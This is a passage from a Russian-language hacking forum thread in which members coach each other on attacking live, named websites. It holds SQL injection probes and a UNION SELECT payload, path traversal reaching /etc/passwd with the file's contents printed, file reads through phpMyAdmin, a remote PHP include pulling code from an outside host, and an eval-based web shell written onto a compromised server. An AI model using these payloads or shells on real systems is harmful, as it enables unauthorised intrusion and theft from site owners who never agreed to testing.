Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Это бывает, когда стоит антивирус, очень часто, когда серв на винде
     
    1 person likes this.
  2. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    ну там серв не на винде у меня
     
    _________________________
  3. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Это уязвимость???

    http://arbrand.ru/kat_pos.php?id=-1
     
  4. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    пробуй логику если не уверен
    http://arbrand.ru/kat_pos.php?id=1+and+1=1 и
    http://arbrand.ru/kat_pos.php?id=1+and+1=0

    ну и различные /* -- # если резултат ни какого изменения то не уязвимость =)

    ЗЫ проверил , не пашет логика =)
     
    _________________________
    1 person likes this.
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Shadrin, Max upload filesize ограничение скорей всего
     
  6. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    4 килобайта попробовал загурузить пофик
     
  7. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Сервак на винде? Иногда там временная папка для аплоаденных файлов не задана или некорректно задана и php не может файл прочитать.


    Попробуй создай php файл следующий

    и им попробуй аплоаднуть.
     
    2 people like this.
  8. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    А вот это уязвимость???

    http://arbrand.ru/index.php?id=info&razdel=zakon&stat=-1'
     
    1 person likes this.
  9. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    это дыра в пхп кодах Пхп иньекция
    Вот тебе скуля
    http://www.warrencountypa.net/current/com.php?ID=1
    На ней практикуйся
     
    1 person likes this.
  10. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605

    это пхп инъекция

    result :
    http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../index.php%00

    http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../../../../etc/passwd

    PS жесткий прикол Новичок (7/-4) ± гринки 7 простой -4 :D
     
    _________________________
    #8770 HAXTA4OK, 6 Sep 2009
    Last edited: 6 Sep 2009
    1 person likes this.
  11. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    1 А бываю Flash Shell на action script написанные??

    2 Что полезного моно от сюда извлечь????


    Code:
    root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news
     
    #8771 geforce, 7 Sep 2009
    Last edited: 7 Sep 2009
  12. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    Это же вроде скрытая скула???http://www.warrencountypa.net/current/com.php?ID=-1
     
  13. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Ты когда мозгами думать начнешь, а не тупо бежать задавать тупые вопросы в этой ветке?
    _http://www.warrencountypa.net/current/com.php?ID=-1+union+select+1,concat_ws(0x3a,user(),version()),3,4,5,6+--+

    1. флеш исполняется на стороне юзера, нет
    2. ничего
     
    #8773 BlackSun, 7 Sep 2009
    Last edited: 7 Sep 2009
    3 people like this.
  14. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    При выводе из БД выдаёт такие символы:

    Code:
    lIlIllIIIlllIIllIIlIlllllllIIIIlIlI
    причём только из колонок username И password :)
    никто не сталкивался?
     
  15. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    могут фильтроваться колоки, или быть обманками (пустая колонка, или забитая фигней) еще можно поиграться с лимитом!!! Но я точно не знаю
    Если не трудно кинь скуль в лс я гляну)))
     
    #8775 [x60]unu, 7 Sep 2009
    Last edited: 7 Sep 2009
  16. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    Есть рут доступ к phpmyadmin
    для раскрытия пути использовал точку после пхп сесии.
    выдало мне это
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1PHP Notice: Undefined variable: id in D:\name1\sname2\www\file.php on line 6
    Далее захожу в phpmyadmin выполняю,
    Code:
    SELECT load_file( 'D:\name1\sname2\www\file.php' ) ;
    ответ NULL,(и другие файлы пробовал такая же фигня)я понял уже что замута с путями,что не так вышло я не пойму :confused:
    спасибо!
     
  17. cr0w

    cr0w Elder - Старейшина

    Joined:
    11 Sep 2008
    Messages:
    92
    Likes Received:
    141
    Reputations:
    33
    Shadrin

    Используй в записи пути к файлу прямые слеши, а не обратные.
     
    1 person likes this.
  18. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    спасибо cr0w

    в файл пишет и вижу такой код
    Code:
    <? @include("http://xxx.narod.ru/a.txt"); ?>
    это я как понимаю у него прав на выполнение нету?попробовал несколько папок такая фигня везде :confused:
     
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    а в файл чонить попроще нельзя написать? И что значит "у него прав на выполнение нету"? Ты реально это просто почуствовал?

    <?eval($_GET[e]);?> - в файл

    http://сайт/путь к файлу/файл.php?e=phpinfo();

    PS: А для начала хотя бы просто <?php phpinfo();?> в файло запиши.

    НЕТ, нам сразу нужно удаленно чото инклудить. На 90% серваков allow_url_include отключен нафиг. Думайте головой уже, сначала хоть что-то простейшее на php загрузите, потом уже делайте выводы.
     
    #8779 Pashkela, 8 Sep 2009
    Last edited: 8 Sep 2009
    1 person likes this.
  20. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    Записал <?php phpinfo();?> вижу инфо пхп
    Записал <?eval($_GET[e]);?> ,при запросе файл.php?e=phpinfo(); вижу в пустую стариницу
    и исходном коде <?eval($_GET[e]);?>

    :confused:
     
    #8780 Shadrin, 8 Sep 2009
    Last edited: 8 Sep 2009
Thread Status:
Not open for further replies.